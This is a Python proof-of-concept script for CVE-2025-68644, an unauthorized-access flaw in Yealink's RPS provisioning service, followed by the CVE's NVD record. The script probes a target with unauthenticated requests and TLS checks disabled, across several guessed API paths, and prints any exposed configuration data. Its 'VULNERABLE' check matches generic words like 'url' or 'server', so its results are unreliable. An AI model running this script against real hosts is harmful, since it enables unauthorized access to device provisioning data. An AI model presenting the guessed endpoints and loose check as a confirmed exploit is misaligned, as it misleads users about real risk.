CVE-2025-68644

# CVE-2025-68644 PoC - Yealink RPS Unauthorized Access # Target: Yealink RPS before 2025-06-27 import requests import sys import json def check_cve_2025_68644(target_url): """ Check if target Yealink RPS is vulnerable to CVE-2025-68644 This PoC demonstrates unauthorized information disclosure """ # Common RPS API endpoints that may expose AutoP URL endpoints = [ "/api/v1/autop/server", "/api/provisioning/autop", "/rps/api/config", "/api/v1/rps/settings", "/api/v1/device/config", "/autop/url", "/api/autop" ] print(f"[*] Testing {target_url} for CVE-2025-68644") print(f"[*] Target: Yealink RPS Unauthorized Access to AutoP URL") vulnerable = False for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # No authentication headers - demonstrating the vulnerability response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: # Check if response contains sensitive information data = response.json() if response.headers.get('content-type', '').find('json') > -1 else response.text # Look for AutoP URL patterns if 'autop' in str(data).lower() or 'url' in str(data).lower() or 'server' in str(data).lower(): print(f"[+] VULNERABLE: {url}") print(f"[+] Status Code: {response.status_code}") print(f"[+] Response: {json.dumps(data, indent=2)[:500]}") vulnerable = True except requests.exceptions.RequestException as e: print(f"[-] Error testing {url}: {e}") if not vulnerable: print("[*] Target may not be vulnerable or RPS service not found") return vulnerable if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-68644.py <target_url>") print("Example: python cve-2025-68644.py https://rps.example.com") sys.exit(1) target = sys.argv[1] check_cve_2025_68644(target)

{"cve": {"id": "CVE-2025-68644", "sourceIdentifier": "[email protected]", "published": "2025-12-21T04:16:05.270", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "Yealink RPS before 2025-06-27 allows unauthorized access to information, including AutoP URL addresses. This was fixed by deploying an enhanced authentication mechanism through a security update to all cloud instances."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-290"}]}], "references": [{"url": "https://www.yealink.com/en/trust-center/security-bulletins/yealink-unauthorized-access-to-rps-vulnerability", "source": "[email protected]"}, {"url": "https://www.yealink.com/website-service/download/Yealink_RPS_Security_Remediation_Verification_Report.pdf", "source": "[email protected]"}]}}